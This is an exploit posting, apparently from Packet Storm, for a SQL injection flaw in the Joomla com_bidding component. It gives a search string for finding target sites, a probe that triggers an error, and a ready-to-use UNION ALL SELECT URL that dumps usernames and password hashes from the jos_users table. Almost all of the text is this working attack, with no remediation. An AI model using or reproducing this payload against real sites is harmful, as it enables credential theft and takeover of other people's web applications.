The Joomla Bidding component suffers from a remote SQL injection vulnerability.
650b19e9d4b45c03f5ff96feb56195efca04d692a39e01082f6da57705260c57
# Title:Joomla com_bidding Sql Injection Vulnerability
# Author: N2n-Hacker
# Date:2010-03-16
# Script: --[Joomla]--
#########################################################################
#########################################################################
[ Joomla com_bidding Sql Injection Vulnerability ]
N2n-Hacker ----- 2nd@live.fr<mailto:2nd@live.fr>
#########################################################################
#########################################################################
# Searching = "option=com_bidding"
==> http://www.site.com/index.php?option=com_bidding&id=200' <=[SQLi]--
# error =
"Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result"
==> Exploiting = http://www.site.com/index.php?option=com_bidding&id=-200 UNION ALL SELECT 1,2,
concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from jos_users--
\\\\\\\\\\\\\\\\\\ Activer khfif drif //////////////////
#########################################################################
My Bad Life But Not For4ver nchallah
#########################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed